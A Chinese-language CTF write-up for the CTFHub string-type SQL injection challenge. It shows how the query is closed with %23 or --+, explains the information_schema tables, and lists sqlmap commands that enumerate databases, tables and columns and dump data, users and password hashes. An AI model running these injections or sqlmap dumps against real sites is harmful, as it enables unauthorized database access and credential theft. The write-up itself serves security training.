CTFHub(字符型注入)

目录

手动注入

sqlmap注入


手动注入

CTFHub(字符型注入)_第1张图片

注入类型是否为字符型注入,在输入id=1的时候发现输出结果为id=’1’,判断类型为字符串形

CTFHub(字符型注入)_第2张图片

需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错

CTFHub(字符型注入)_第3张图片

判断列数,发现是两列

CTFHub(字符型注入)_第4张图片

 库名为sqli

CTFHub(字符型注入)_第5张图片

 爆出一个news和flag两个表,开始跑列名

CTFHub(字符型注入)_第6张图片

列名为flag ,查询列内容

CTFHub(字符型注入)_第7张图片

 

Mysql表类型:在mysql内自带一个数据库,名为information_schema,在这个数据库内

schemata,包含了所有的数据库名字

tables,包含了所有数据库表

columns,包含了所有字段

column_name:列的名称

Information_schema.columns:表示所有的列的信息

Information_schema:表示所有信息,包括库、表、列

Information_schema.tables:表示所有的表的信息

table_schema:数据库的名称

table_name:表的名称

sqlmap注入

关于sqlmap的基础命令,将url修改为需要注入的url即可

查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1
查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs
获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump

查询数据库的所有用户
sqlmap.py -u url/?id=1 --users
查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords
查询数据库名称
sqlmap.py -u url/?id=1 --current-db

你可能感兴趣的:(ctfhub,SQL注入,sql,mysql)